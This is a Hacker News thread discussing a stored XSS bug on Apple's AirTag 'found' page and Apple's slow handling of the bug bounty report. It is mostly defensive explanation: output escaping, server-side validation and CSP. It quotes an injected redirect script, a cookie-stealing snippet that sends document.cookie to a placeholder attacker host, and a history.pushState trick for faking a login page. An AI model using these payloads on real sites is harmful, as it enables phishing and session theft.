[HN Gopher] Apple AirTag Bug Enables 'Good Samaritan' Attack
       ___________________________________________________________________
        
       Apple AirTag Bug Enables 'Good Samaritan' Attack
        
       Author : kaeruct
       Score  : 311 points
       Date   : 2021-09-29 06:49 UTC (16 hours ago)
        
 (HTM) web link (krebsonsecurity.com)
 (TXT) w3m dump (krebsonsecurity.com)
        
       | twhb wrote:
       | More info: https://medium.com/@bobbyrsec/zero-day-hijacking-
       | icloud-cred...
       | 
       | After reading OP, I was under the impression this is something
       | silly, like being able to enter "Please visit badsite.xyz" in the
        | message you leave. The above makes clear that it's a real XSS:
        | the AirTag owner can run scripts on found.apple.com.
        
         | planb wrote:
         | From that page: An attacker intercepts this request, and
         | injects this malicious payload into the phone number field:
         | <script>window.location='https://10.0.1.137:8000/indexer.html';
         | var a = '';</script>
         | 
          | Really, what year is this, 2005? How is embedding unescaped
          | user input into a web page still a thing? Most modern
          | frameworks make it really hard to do this even on purpose...
        
           | rjmunro wrote:
            | This attack is far more serious than that example reveals.
            | Instead of directing users elsewhere, you could replace the
            | contents of the page to look like an iCloud login form while
            | remaining inside the apple.com domain.
            | 
            | Depending on how the rest of Apple.com's site is configured,
            | you could steal cookies and allow yourself to log in without
            | even needing a fake login page. You might be able to directly
            | manipulate the user's account.
        
             | bayindirh wrote:
              | > Depending on how the rest of Apple.com's site is
              | configured, you could steal cookies and allow yourself to
              | log in without even needing a fake login page. You might be
              | able to directly manipulate the user's account.
             | 
              | IIRC every process inside iOS has its own cookie jar and
              | browser container, so application X cannot read iOS
              | Safari's or application Y's cookie jar, or any cache for
              | that matter.
              | 
              | So every application's web view is effectively isolated on
              | the OS.
        
               | avianlyric wrote:
                | That's irrelevant. The AirTag opens a link in Safari, and
                | allows you to run effectively arbitrary JavaScript in the
                | page that's opened (iCloud).
               | 
               | Containers and cookie jars don't help you if the
               | malicious code is running inside the container your
               | sensitive data lives in.
               | 
                | In this specific example, if the iCloud cookies are
                | marked as JS-visible, and there is no content security
                | policy preventing inline JS, then the injected JS could
                | grab the iCloud cookie and exfiltrate it to an attacker
                | domain.
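                | 
                | For illustration, a minimal sketch of what such an
                | injected payload could do under those assumptions
                | (attacker.example is a placeholder):
                | 
                |   // Only works if the session cookie lacks HttpOnly
                |   // and no CSP blocks inline script.
                |   new Image().src =
                |     'https://attacker.example/steal?c=' +
                |     encodeURIComponent(document.cookie);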
        
             | planb wrote:
             | I wouldn't even be surprised if there are cookies for
             | *.apple.com that you can read this way...
        
             | ronsor wrote:
             | > replace the contents of the page to look like an iCloud
             | login form while remaining inside the apple.com domain
             | 
             | Indeed, and with the history.pushState() API, you can even
             | change the URL to be more realistic.
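              | 
              | A sketch of that trick (fakeLoginFormHtml stands in for
              | whatever markup the attacker supplies):
              | 
              |   // Stays on found.apple.com: pushState can rewrite the
              |   // path shown in the URL bar, but never the origin.
              |   history.pushState({}, '', '/signin');
              |   document.body.innerHTML = fakeLoginFormHtml;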
        
           | chrisjc wrote:
           | Is putting scripts in a phone number field (or any input
           | field) a well known way to hijack requests? I mean when
           | someone is trying to compromise a site, is this one of the
           | first things they try?
           | 
            | Surely (obviously not) at this point in time there has to be
            | some out-of-the-box browser-engine (WebKit/Blink/Gecko) input
            | sanitization for widgets like "input", "textarea", etc.?
            | 
            | I can only imagine this to be the case, so did an Apple
            | employee go out of their way to disable this feature? Or is
            | this simply a case of a rookie developer using variable
            | substitutions in a SQL string instead of a prepared statement
            | and bindings? (SQL injection analogy)
           | 
           | ----
           | 
            | As @rjmunro mentions elsewhere in the thread, if this
            | vulnerability exists in this AirTag application, might it
            | actually be widespread across the entire iOS and macOS
            | codebase? Perhaps that's why Rauch heard little back from
            | Apple?
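            | 
            | To spell out the SQL injection analogy, a minimal sketch
            | using node-postgres (the users table and name column are
            | made up):
            | 
            |   const { Client } = require('pg');
            | 
            |   async function findUser(name) {
            |     const client = new Client(); // config omitted
            |     await client.connect();
            | 
            |     // Vulnerable: `name` is spliced into the SQL text, so
            |     // input like "x' OR '1'='1" rewrites the query itself.
            |     // await client.query(
            |     //   "SELECT * FROM users WHERE name = '" + name + "'");
            | 
            |     // Safe: the value travels as a bound parameter and can
            |     // never be parsed as SQL syntax.
            |     const res = await client.query(
            |       'SELECT * FROM users WHERE name = $1', [name]);
            | 
            |     await client.end();
            |     return res.rows;
            |   }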
        
             | ctdonath wrote:
             | _Is putting scripts in a phone number field (or any input
             | field) a well known way to hijack requests?_
             | 
              | It's on the front page of Hacker News with a clickbait
              | headline, so yeah.
        
             | jameshart wrote:
              | There's certainly no built-in browser sanitization that
              | prevents you from entering XSS or other injection attacks
              | into input fields. Thank goodness. If there were, how could
              | you discuss examples in web forums like this? Or use a
              | webpage to edit code?
              | 
              | XSS and other injections are not problems with data input;
              | they are problems of data output.
        
               | chrisjc wrote:
               | I'm not suggesting that it prevent you from being able to
               | enter specific strings of characters. I think I made that
               | clear by comparing this to a SQL injection issue. After
               | all, how would SQL sites and forums discuss SQL without
               | being able to store and display SQL excerpts?
               | 
                | I'm suggesting that surely these widgets and the
                | respective browser engines that enable them would be
                | mature enough to not blindly evaluate anything that's
                | entered.
        
               | chmod775 wrote:
               | That's not at all what's happening here. It doesn't even
               | have anything to do with input fields, except that the
               | field in the HTTP request that stores the information on
               | Apple's servers was _supposed_ to be filled from one.
               | 
               | This kind of attack essentially tricks Apple into
               | including arbitrary HTML/JavaScript in the webpage that
               | shows information when someone scans the tag. There's no
               | reliable way a browser could even know something untoward
               | was happening.
        
               | chrisjc wrote:
               | Ah! I was actually struggling to understand how inputs
               | had anything to do with it. I thought the input was being
               | rendered with some pre-populated/injected value that in
               | this case was the script.
               | <input><script.../></input>
               | 
               | Then again, if they were able to inject something into
               | the input, chances are they could inject it anywhere, so
               | as you said it has nothing to do with input fields.
               | 
               | Thanks for the clarification.
        
               | mhh__ wrote:
                | Well, we are discussing it now with no issue, so clearly
                | the browser could (or could have, probably too late now)
                | picked a sensible default.
        
               | chmod775 wrote:
               | Browsers aren't doing anything differently because the
               | people who write browsers happen to understand the threat
               | model.
               | 
               | You can sanitize input fields on the client all you want
               | and an attacker would still send whatever the hell they
               | felt like to the server.
        
               | sgerenser wrote:
               | Trying to sanitize on the input side reminds me of
               | Cisco's fix for a vulnerability in their routers that
               | involved disallowing requests with a user agent
               | containing "cURL".
        
               | avian wrote:
               | Imagine Stack Overflow, but without code snippets. Sounds
               | more like an idea for an art project.
               | 
               | It would probably read like early texts on mathematics
               | before modern notation was invented, where it's all just
               | textual descriptions on how to solve various problems.
        
               | gowld wrote:
               | That's another way of saying "all code input must be
               | escaped" :-)
        
               | [deleted]
        
               | mhh__ wrote:
                | Adding a flag to allow people to write Stack Overflow is
                | perfectly reasonable; the default should not allow non-
                | expert programmers to waltz into issues like this.
        
               | shkkmo wrote:
                | This isn't "expert"-level knowledge. This is a basic
                | principle of any client/server system.
                | 
                | In fact, including default client-side protections would
                | not have fixed this issue (since this issue involved
                | bypassing client-side protection).
        
               | [deleted]
        
               | jameshart wrote:
               | The sensible default is to allow arbitrary text input and
               | pass it on correctly encoded to the next system.
               | 
               | Which is what browsers do.
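                | 
                | For example, when a form is submitted, the browser
                | percent-encodes the raw text for the HTTP request
                | without caring what it "means" (a quick sketch):
                | 
                |   // The form layer encodes for its own context (URL
                |   // encoding); interpretation is left to the receiver.
                |   new URLSearchParams({
                |     phoneNumber: "<script>alert(1)</script>",
                |   }).toString();
                |   // "phoneNumber=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"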
        
               | [deleted]
        
             | afavour wrote:
              | The problem here is not input, it's output. Apple's web
              | backend is spitting out strings without escaping them for
              | HTML, which is a real novice error at this point in the
              | web's evolution. Sanitising inputs in browsers would be a
              | nightmare of never-ending complication.
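              | 
              | The missing step is roughly this (hand-written here only
              | for illustration; in practice a templating engine should
              | do it by default, and phoneNumber is a hypothetical value):
              | 
              |   // Escape the HTML-significant characters before
              |   // interpolating untrusted text into markup.
              |   function escapeHtml(s) {
              |     return String(s).replace(/[&<>"']/g, (c) => ({
              |       '&': '&amp;', '<': '&lt;', '>': '&gt;',
              |       '"': '&quot;', "'": '&#39;',
              |     }[c]));
              |   }
              | 
              |   const page = `<p>Call: ${escapeHtml(phoneNumber)}</p>`;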
        
               | still_grokking wrote:
                | Actually you can't "sanitize" inputs, as you can't know
                | upfront in which context the data will end up.
                | 
                | So the rule is: never try to "sanitize" inputs; always
                | escape outputs according to the output context.
               | 
               | Regarding XSS there is this nice overview:
               | 
               | https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter
               | _Ev...
               | 
                | As this is a complicated topic, one should never try to
                | escape things "by hand", for example with some "clever"
                | regex. You won't catch all the possible encodings that
                | way!
        
             | chmod775 wrote:
              | > Surely (obviously not) at this point in time there has to
              | be some out-of-the-box browser-engine (WebKit/Blink/Gecko)
              | input sanitization for widgets like "input", "textarea",
              | etc.?
              | 
              | Client-side sanitization of _input_ fields won't save you
              | in this case.
              | 
              | In fact it will _never_ save you.
             | 
             | Here's a "non-technical" example of why it wouldn't help,
             | without even having to go into the details of making manual
             | HTTP requests: Even if you have a browser that tries to
             | sanitize input fields so it doesn't send anything to the
             | server that causes the server to do bad things, an attacker
             | could just use a different browser, or a modified browser,
             | to send whatever the hell they wanted anyways.
             | 
             | Client side input sanitation is not security. It's just for
             | UX.
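              | 
              | Concretely, nothing stops an attacker from skipping the
              | form entirely. A sketch (the endpoint and field name are
              | made up, not Apple's real API):
              | 
              |   // No browser form involved: a direct request carrying
              |   // whatever bytes the attacker likes.
              |   await fetch('https://example.com/api/report-lost', {
              |     method: 'POST',
              |     headers: { 'Content-Type': 'application/json' },
              |     body: JSON.stringify({
              |       phoneNumber: '<script>/* payload */</script>',
              |     }),
              |   });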
        
               | chrisjc wrote:
                | While what you're saying is true, and what I described is
                | not what is actually happening, I don't think you
                | understood what I was trying to describe. Even so, I may
                | still be wrong.
                | 
                | I understand that client-side validation is only a
                | cosmetic, first-round attempt at sanitization.
               | 
                | My understanding (which is wrong) was that the malicious
                | script was being injected into the HTML input, where it
                | was finally rendered and invoked at the same time. I was
                | suggesting that the contents of an input (the value)
                | should never be rendered (and as a result, activated) the
                | way other content outside of an input is rendered.
               | 
               | Even if content within an input is never rendered, it
               | makes little difference since the attack is able to
               | inject the script in other places outside of an input
               | anyways.
               | 
               | So as others pointed out, nothing to do with inputs.
        
             | londons_explore wrote:
             | > might it actually be wide-spread across the entire iOS
             | and mac OS code-base?
             | 
             | I suspect this is likely. It's generally accepted that it
             | isn't possible to sanitize arbitrary user input before
             | saving it into the database. There will always be someone
             | called "<script>".
             | 
             | Instead you must format the data correctly when displaying
             | it to the user. That means every place you get data from a
             | database and process or display it, you should be using
             | framework libraries to make sure no injection attacks can
             | happen.
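              | 
              | In the browser, that often comes down to picking the right
              | DOM API (el here is some hypothetical element):
              | 
              |   // innerHTML parses the string as markup, so a stored
              |   // payload like "<img src=x onerror=alert(1)>" runs.
              |   el.innerHTML = userSuppliedName; // unsafe
              | 
              |   // textContent treats the same string as inert text.
              |   el.textContent = userSuppliedName; // safe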
        
               | gowld wrote:
               | Framework libraries or languages that have types for
               | separating taintable data from executable code.
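                | 
                | In JavaScript, a lightweight version of that idea is a
                | tagged template that escapes every interpolated value, so
                | untrusted data can't cross into markup unescaped (a
                | sketch; phone is a hypothetical value):
                | 
                |   // Literal parts are trusted markup; interpolations
                |   // are data and get escaped unconditionally.
                |   const esc = (s) => String(s).replace(/[&<>"']/g,
                |     (c) => `&#${c.charCodeAt(0)};`);
                |   const html = (parts, ...vals) =>
                |     parts.reduce((out, p, i) =>
                |       out + esc(vals[i - 1]) + p);
                | 
                |   const page = html`<p>Call: ${phone}</p>`;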
        
             | rjmunro wrote:
             | > Is putting scripts in a phone number field (or any input
             | field) a well known way to hijack requests?
             | 
              | 100% yes. It's called an XSS vulnerability. It was No. 1 in
              | the Open Web Application Security Project (OWASP) Top Ten
              | 2017, although now that sites don't make this mistake very
              | often, it's fallen to number 3 in the 2021 list.
             | 
              | > ... widespread across the entire iOS and macOS codebase
              | 
              | It's not in the iOS or macOS codebase, it's in the Apple
              | website codebase. It could well be widespread there.
        
             | planb wrote:
              | The input field isn't the problem here. In fact, the
              | article even mentions that you need to hijack the request
              | and alter the phone number. So I guess the Apple engineer
              | who created this feature fell for the same misunderstanding
              | that you did: user input can never be trusted, even when
              | validated client-side. You always have to do server-side
              | validation!
        
               | chrisjc wrote:
                | Just to be clear, I wasn't suggesting that client-side
                | validation was the issue.
               | 
               | See my response above.
               | 
               | https://news.ycombinator.com/item?id=28697485
        
           | fortran77 wrote:
           | This is like bugs we used to see on "MySpace". Is Apple
           | unable to hire good people anymore given their current
           | corporate culture?
        
             | shadowfiend wrote:
             | Which culture is that?
        
             | aaaaaaaaaaab wrote:
             | Apple hires top hardware engineers, good software
             | engineers, and ok web engineers.
        
               | capableweb wrote:
               | > ok web engineers
               | 
               | How are engineers who introduce XSS issues on production
               | systems "ok" in 2021?
               | 
                | Makes me doubt the rest of your statement too, but mainly
                | because I'm actually an Apple user myself, so I know for
                | a fact that neither the software nor the hardware people
                | are "top".
        
               | frenchy wrote:
               | I can only assume they mean "ok" in the sense of "the
               | large fraction of less-sophisticated engineers who only
               | want to think about the happy paths in their code."
               | 
                | GitHub's Copilot is a poor code generator, but it's a
                | fair example of how bad a lot of public code is. I'm not
                | sure private code tends to be much better in many orgs.
        
               | Abishek_Muthian wrote:
                | Apple outsources web development to low-cost centers as
                | well.
        
             | consumer451 wrote:
             | Honest question: are these the results of the seemingly
             | industry-wide push to axe QA departments?
        
               | amatecha wrote:
               | Probably not. QA can't really stop devs from shipping
               | buggy code (depending on release pipeline/processes). Of
               | course a top-notch security team should have audited
               | these services and the infrastructure around them,
               | considering it's Apple...
        
               | _3u10 wrote:
                | Yup, my experience has been usually needing to give QA a
                | list of strings with SQL/script injection, as well as
                | Unicode strings with characters outside the BMP, though
                | emojis now usually cover that case.
        
               | ffhhj wrote:
               | I work in QA at one of the BIG ones on hardware/software,
               | and you would be scared how little top backend/frontend
                | devs care about security, other than plugging in some
               | common solution. I'm right now detecting vulnerabilities,
               | I'm running test cases, writing reports with clear
               | descriptions and screenshots of the holes in the system,
               | and yet I'm pretty sure all of that will go into the
               | managerial sewer because they don't want to take the
               | costs of solving it. But I'm sure if I point to the
               | company/project I'll be kicked out of my job.
        
               | moistly wrote:
               | I've worked on contracts for data integration projects
               | for both financial and healthcare providers. There is a
               | shocking lack of concern about code correctness,
               | security, privacy, etc. And code quality? Pshaw, just
               | pump out a solution, even if it's a nasty hack instead of
               | a well-considered solution.
        
           | drdaeman wrote:
            | And even if unescaped input got through, what year is this,
            | 2012? Content-Security-Policy has been a thing for almost a
            | decade.
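            | 
            | Even a single response header along these lines would have
            | kept the injected inline script from running (a sketch; a
            | real policy needs tuning for the page's own assets):
            | 
            |   Content-Security-Policy: script-src 'self'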
        
       | aaaaaaaaaaab wrote:
       | Lol. The good old Bobby Tables attack.
        
       | breakingcups wrote:
       | This multi-billion dollar company is somehow managing to
       | mismanage responsible disclosure and their bug bounty program in
       | such a way that it's actually detrimental to them. It's
       | astonishing.
       | 
        | It's _so easy_ to get soft wins running a program like this.
        | Communicate with the reporter, make sure you have enough of a
        | mandate inside the company to get things fixed in time; it's a
        | boon to your reputation even if the reporter gets to publicly
        | disclose the weakness.
       | 
       | Now they still have the public disclosure of the weakness, but
       | they get the added reputation hit of seemingly not caring, or not
       | being able to get serious security issues that jeopardize their
       | users fixed. Not a good look for a company supposedly obsessed
       | with users' privacy.
        
         | cromka wrote:
          | I wonder if the EU's next (justifiable) excuse to take those
          | companies to court is going to be "gross negligence in
          | protecting user data". Not that anyone would expect them to
          | ever be bug-free, but given those recent reports on how they
          | handle white-hats, they really deserve to be slapped with some
          | hefty fine. And it wouldn't really be the money, but the bad
          | publicity, that would _actually_ cost them something.
         | 
          | Just imagine those Google ads "mocking" iPhone's
          | "security/privacy" after they're found guilty of not giving two
          | f*cks.
         | 
         | Disclosure: saying this as a fully-invested but otherwise
         | pissed Apple user.
        
         | Svoka wrote:
          | Bug bounty programs are a mess. I once reported a bug to
          | Google. It was a serious issue that allowed changing 2FA and
          | password without having access to anything except an
          | "application-specific password" you could generate to use for
          | POP3/IMAP access.
         | 
          | When I reported it, I was confronted by an AI with unwelcoming
          | replies: "you don't understand, this is a feature, not a bug".
          | But, regardless, I was sent a bunch of scary emails with
          | threats not to disclose this to anyone. I gave up; I had other
          | stuff going on in my life.
         | 
          | Two years later, with fanfare, some "security firm" discovered
          | the bug and rolled out the full self-PR campaign with nice
          | pictures describing the bug and how they got 1337 money. At
          | that point I realized that bug bounties are only for
          | professionals who have connections and willing ears to listen
          | to them.
         | 
          | I understand that from the standpoint of big companies they are
          | flooded with requests, but it doesn't make me feel better. I
          | reported a serious security issue a whole two years before they
          | fixed it, but got absolutely nothing for it except threats and
          | gaslighting.
        
           | todd3834 wrote:
            | I share some of this frustration. I once spent a ton of time
            | finding XSS vulnerabilities for a Delta Airlines bug bounty
            | program. One by one, I would find and submit a report with
            | instructions and screenshots. Every time, they would reply
            | saying they were already aware of the bug, so no bounty.
            | While I don't doubt they were telling the truth, it took away
            | my motivation to invest time in this type of exercise going
            | forward.
        
           | volta83 wrote:
           | So what did you learn out of this, and what would you do
           | differently?
           | 
           | What do you think people should do differently when reporting
           | these issues?
        
             | handrous wrote:
             | > What do you think people should do differently when
             | reporting these issues?
             | 
             | ... sell vulns to bad actors for Monero or something?
        
             | marcosdumay wrote:
             | > So what did you learn out of this, and what would you do
             | differently?
             | 
             | The obvious lesson is "don't participate in bug hunting
             | programs".
        
             | paulryanrogers wrote:
             | These questions imply the onus is on reporters of problems.
             | I get the impression the root causes reside with the
              | companies offering half-hearted bug bounties.
        
         | prox wrote:
          | That department is probably in the navel-staring phase of the
          | business lifecycle, where managers are just absorbed in their
          | own world of projects and goals instead of looking out and
          | making sure the day-to-day work runs smoothly.
        
           | goldenkey wrote:
            | That department is essentially the red-headed stepchild.
            | Think about it: what manager would want to be in charge of a
            | team with no feature-set timeline, milestones, etc.? It's
            | exactly like you said: having a functional and working team
            | that gets the day-to-day bugs fixed doesn't gain any clout in
            | the company. Instead, you need to be in the AI or hardware
            | division, so you can be respected as a "pioneer."
            | 
            | It's all about values. Security and, let's say, all submitted
            | bugs fixed within 30 days... that would be pioneering status
            | for a company. Good luck getting approval for funding and
            | staffing for that, though, in a company obsessed with those
            | navel-gazing commercials about space travel and such...
        
             | prox wrote:
              | That makes me wonder if the tenor changed under Tim. Steve
              | was much more of a perfectionist.
        
               | [deleted]
        
         | [deleted]
        
       | lol768 wrote:
       | > Apple's Lost Mode doesn't currently stop users from injecting
       | arbitrary computer code into its phone number field
       | 
       | Can we be precise when writing about security vulnerabilities?
       | It's a stored XSS in the phone number field.
       | 
       | You can include precise technical details whilst still writing an
       | article suitable for a broad audience.
        
         | gowld wrote:
          | The XSS isn't in the phone field. The S is in the phone field;
          | the XS is in how Apple delivers the phone field value.
        
       | asiachick wrote:
        | I'm not sure I'm convinced this is a problem. I can do the same
        | thing just by putting QR codes on stuff. Someone is curious,
        | scans the code, clicks the link. Way cheaper to print sheets of
        | QR code stickers than $30-a-pop AirTags.
        
         | jmull wrote:
         | [1] is a better explanation of how this can be exploited.
         | 
          | Basically, a victim finds an AirTag and, as a Good Samaritan,
          | opens the "found" link to attempt to reunite the AirTag with
          | its owner. The key is, the victim may trust the Apple AirTag to
          | direct them to a secure, private web page, so they may be
          | willing to do something like provide their iCloud credentials
          | when prompted.
          | 
          | It's not an attack that would be deployed indiscriminately --
          | it costs an attacker $30 for a _chance_ that a desired target
          | will find the AirTag, be a Good Samaritan, and interact with
          | the "found" page as hoped. But it could make sense against
          | high-value targets.
         | 
         | [1] https://medium.com/@bobbyrsec/zero-day-hijacking-icloud-
         | cred...
        
         | alexatalktome wrote:
         | I think the intended attack is to fake an apple login page with
         | the link. You open an actual apple.com page first when you find
         | a tag - so pretty safe to scan - then if you open the link
         | you'll get an apple login page. Not suspicious.
         | 
         | Now you've phished the apple credentials off someone thinking
         | they're helping find you lost keys. Less people would scan a
         | random QR code they found. And even fewer would mistake it for
         | a real apple login and feel compelled to login.
        
           | asiachick wrote:
            | I'm sure I could design codes people would scan. Ideas: "dog
            | lost, scan to help", "win a free iPad at Apple [Apple logo]
            | official back-to-school give-away for education [QR]", "50%
            | off Coke [QR]", etc... and just make up a domain:
            | "officialapplecontest.com", "couponsforcoke.com", etc.
        
             | eCa wrote:
              | No, you can't get me to scan a QR code found in the wild.
              | 
              | It's on Apple to convince us that it is safe to scan
              | AirTags. And currently their messaging is that they don't
              | care?
              | 
              | Then I ain't scanning no AirTag.
        
               | rjmunro wrote:
                | This isn't an AirTag bug as such. This is a bug in
                | displaying user information on Apple's website; it just
                | happens to be in the part that was made for AirTags to
                | link to. It's a simple XSS vulnerability.
                | 
                | The fact that Apple let such a stupid bug into their
                | website is worrying enough. The fact that they don't
                | acknowledge and fix it within hours, when reported to
                | them via their bounty program, means that it's not just
                | "don't scan AirTags" you should be thinking; it's "don't
                | visit apple.com / icloud.com / other Apple websites".
        
               | fortran77 wrote:
                | > The fact that Apple let such a stupid bug into their
                | website is worrying enough.
                | 
                | Those recent articles about large groups of employees
                | pushing the company to take stands on anything but work-
                | related matters make me wonder if the sane, competent
                | employees have either left or have "mentally checked
                | out."
               | 
               | See: https://www.nytimes.com/2021/09/17/technology/apple-
               | employee...
        
             | iforgotpassword wrote:
              | Sure, you could do that and get some people to fall for it.
              | But in the end, you can just call them stupid for scanning
              | random QR codes and then entering private information. No
              | involvement by Apple.
              | 
              | An AirTag is a product by a big company that claims to be
              | trustworthy and claims its products are safe. You are
              | actually told by Apple to scan those AirTags, made by them.
              | So you find an Apple AirTag, scan it with your Apple
              | iPhone, and an Apple login form is presented to you. Way,
              | _way_ different from that QR code scenario.
        
             | [deleted]
        
             | simion314 wrote:
              | The story has two main ideas:
              | 
              | 1. Apple is bad at security.
              | 
              | 2. Apple is bad at relations with security researchers.
              | 
              | So as a fanboy you forgot to defend the second part (and
              | the zero-days from last week caused by the second point).
        
         | [deleted]
        
         | kataklasm wrote:
          | You know, I'm always astonished at the lengths people go to
          | defend Apple!
          | 
          | Apple makes a gadget that has an explicit mode for Good
          | Samaritans to locate the original owner. This mode has a
          | security flaw (lack of input validity checks; I thought we
          | overcame this stuff last decade?) that opens up the Good
          | Samaritan to abuse by means of phishing. And somehow you want
          | to explain to me that that is not a problem? Just because I can
          | take a random car and drive into people doesn't mean a self-
          | driving car having a bug that drives into people isn't an
          | issue, to give an example of why your logic doesn't pass.
        
           | throwaway287391 wrote:
            | > You know, I'm always astonished at the lengths people go
            | to defend Apple!
           | 
           | The reason this is a serious problem and not equivalent to
           | any other situation where you can get people to click an
           | arbitrary link wasn't immediately obvious to me either. I'm
           | glad the question was asked and answered. I'm not a diehard
           | Apple defender, just someone who's not immersed in this
           | phishing stuff on a daily basis. _shrug_
        
             | Grustaf wrote:
             | Sorry, but what is the answer? I still don't get it.
        
               | johnday wrote:
                | The answer is that a link provided by an Apple AirTag is
                | _expected_ to be secure. Indeed, a page on an Apple
                | domain is _expected_ to have been vetted entirely by
                | Apple, and therefore earns a degree of trust from the
                | Good Samaritan.
                | 
                | As it stands, a malicious user can replace the entire
                | website, still under an apple.com domain, with content of
                | their own devising. This content can, for example,
                | pretend to be an Apple login page and exfiltrate entered
                | credentials.
               | 
               | I hope it's obvious why this form of attack is more
               | malicious and more dangerous than simply putting up an
               | arbitrary QR code.
        
       | heytherewhat wrote:
        | They should use all that filthy money they are making from 30%
        | revenue theft on their App Store to pay out their bug bounty
        | participants properly.
        
         | htk wrote:
         | Theft?
        
           | Razengan wrote:
           | "I should have access to a billion-user ecosystem and hosting
           | and serving and discoverability for free. Never mind that
           | every other platform also costs something to publish on it."
        
             | asiachick wrote:
              | It costs nothing to publish on Windows, macOS, Linux, or
              | Android (it costs to be on the Play Store, but not to
              | publish; there are plenty of free .apks on GitHub or
              | itch.io, for example). Not sure where you got this idea
              | that "every other platform also costs something to publish
              | on it".
        
             | jjulius wrote:
             | >"I should have access ... for free."
             | 
             | OP never actually said any of that. You're assuming that
             | that's what they think, when they actually might be content
             | with a much lower percentage. Ask questions of people to
             | get clarification, as user htk did, instead of insinuating
             | they're ignorant asses.
        
               | xondono wrote:
               | Call me crazy, but if someone uses the word "theft" I
               | think it's implicit that it's not a question of degree.
               | Theft of pennies is still theft.
               | 
               | So I think it's a perfectly valid assumption that OP
               | thinks 0% is the right percentage.
        
       | vmception wrote:
       | Responsible Disclosure(tm) strikes again!
        
       | alexatalktome wrote:
        | Apple's entire dev relations team needs a complete overhaul. Pour
        | money into bug bounties - they have it! Then use that as
        | justification for charging 30% IAP. Also, maybe be nicer to indie
        | devs who help promote your platform.
        
       | frupert52 wrote:
        | It seems the only way to get Apple to cooperate is to demonstrate
        | how this can hurt them and their product. Article headlines need
        | to be something like "Attention: Apple's AirTags are not safe to
        | scan", written for consumer consumption, then delivered as a PSA
        | to different news media. News sites and channels love to be the
        | first with this stuff, too.
        
       | krisoft wrote:
        | Here is a theory: Apple's response here might have been slow
        | because they misrouted the bug. This is a stored web XSS
        | vulnerability. It has nothing to do with the AirTag, other than
        | that the page is related to that device.
        | 
        | If during triage they accidentally sent the bug to the team that
        | developed the AirTag's firmware, then they might have got
        | confused and not handled the ticket appropriately.
        | 
        | Obviously this is not an excuse, and a big company should know
        | better, but it can explain why the handling was sub-optimal. Just
        | look at this very forum and the amount of confusion present in
        | the comments. There are people questioning whether a stored XSS
        | is really that bad (yes, it is), or asking why browsers don't
        | validate inputs by default (it wouldn't help). There is nothing
        | wrong with these questions! The problem and the solution are
        | obvious to someone who has worked on web security before, but if
        | this is the first time you are wrapping your mind around the
        | concept, you might mess things up. In the same way, if a web
        | developer is asked to fix a kernel-level buffer overflow, they
        | won't have the right mental toolset to understand the problem,
        | let alone the ability to fix it.
        
         | planb wrote:
          | Very likely. Because Apple does not take bug reports seriously,
          | they probably have no team that is in charge of the whole
          | process, from first evaluation to fixing the bug. As soon as
          | the issue is redirected to the responsible development team, no
          | one but them cares about it anymore. This hurts the whole
          | company, especially for security issues.
        
       | julianlam wrote:
        | XSS is a special type of bug bounty report... we[0] get them
        | occasionally, and by and large they're easy to fix -- sanitize
        | the input on the way out.
       | 
        | What some HN commenters don't understand here is that XSS is
        | special not because it's particularly nasty (though it can be),
        | but because it can creep in without you knowing. You can be aware
        | of it, but one can still slip in if you're not actively guarding
        | against it while coding. When you have a hundred things on your
        | mind, and a complex model of the frontend and backend living in
        | your brain's RAM, it's easy to forget about something like
        | sanitizing the output of user-generated content.
       | 
        | It's easy to say AFTER the fact that you should never trust user
        | input... obviously I don't, but these bugs still happen, and I'm
        | thankful every day that pentesters check us for XSS as part of
        | our bug bounty process.
       | 
       | XSS vulns happen to a lot of developers, Apple devs included. It
       | definitely should've been caught during a code review process,
       | but the silver lining to all of this is that the fix is actually
       | rather simple... update the site to sanitize the input on the way
       | out. No firmware changes needed to the physical devices
       | themselves.
       | 
       | [0] NodeBB.org
        
         | kobalsky wrote:
          | There may be situations where a mistake is understandable
          | because it was a who-would-have-thought situation, but in this
          | scenario it takes effort to shoot yourself in the foot.
          | 
          | Apple can't seriously be using an insecure-by-default
          | templating engine to render HTML.
          | 
          | On one of my older projects I'm using a 12-year-old framework
          | that already had XSS filtering by default when inserting
          | values.
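          | 
          | For comparison, in Handlebars the escaping default has been
          | safe for years; you have to opt out explicitly (a quick
          | sketch):
          | 
          |   const Handlebars = require('handlebars');
          | 
          |   // {{phone}} HTML-escapes by default; the triple-stache
          |   // {{{phone}}} would be needed to opt out.
          |   const render = Handlebars.compile('<p>Call: {{phone}}</p>');
          |   render({ phone: '<script>alert(1)</script>' });
          |   // '<p>Call: &lt;script&gt;alert(1)&lt;/script&gt;</p>'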
        
       | rickdeckard wrote:
        | Considering that within days of the launch a hardware researcher
        | had already found a way to rewrite the AirTag to direct to an
        | entirely different URL [1], a "bad actor" might not even bother
        | with such an easily fixable webpage issue...
       | 
       | [1] https://twitter.com/ghidraninja/status/1391165711448518658
        
         | chrisjc wrote:
          | Interesting. Then again, even if Apple made it immutable,
          | what's to stop bad actors from having a bunch of lookalike tags
          | manufactured with plain old NFC?
          | 
          | edit: Apple has no native support for reading NFC tags; you can
          | only do it within apps. So I guess my idea wouldn't work for
          | now.
        
         | cmeacham98 wrote:
         | If I'm an attacker, I'm not using this vulnerability to
         | redirect you to an evil website, but instead to inject a fake
         | login prompt. When you go to check the domain like a good user,
         | you'll see it's on the Apple official website found.apple.com,
         | perfectly safe to enter your credentials on!
         | 
         | The ability to impersonate Apple _on their own domain_ is
         | definitely a bigger risk than rewriting the URL or
         | manufacturing a look-alike tag.
        
         | rjmunro wrote:
          | I thought the URL was displayed when you scanned an NFC tag,
          | before you opened it. If the URL is from apple.com or
          | icloud.com, you know you can trust it. If the URL is someone
          | else's, you know not to trust it.
         | 
          | An XSS can do a lot more than just redirect you. It could
          | construct a fake Apple login page inside the apple.com domain,
          | so you would have no reason to suspect it was a phishing
          | attack. You could probably construct something like the MySpace
          | Samy worm (https://en.wikipedia.org/wiki/Samy_(computer_worm))
          | to spread through AirTag users and change everyone's AirTags to
          | point to your malicious script.
        
           | chrisjc wrote:
            | > I thought the URL was displayed when you scanned an NFC
            | tag, before you opened it. If the URL is from apple.com or
            | icloud.com, you know you can trust it. If the URL is someone
            | else's, you know not to trust it.
            | 
            | While you obviously know what you're talking about, you can't
            | honestly think that the majority of people would know any
            | better? Even if most people knew better than to click
            | nwidjjjj.biz/lkqpdi15, something like
            | youfoundmyairtag.hr/tag=238s71j would probably still fool
            | enough people to make it a viable vector.
        
             | petee wrote:
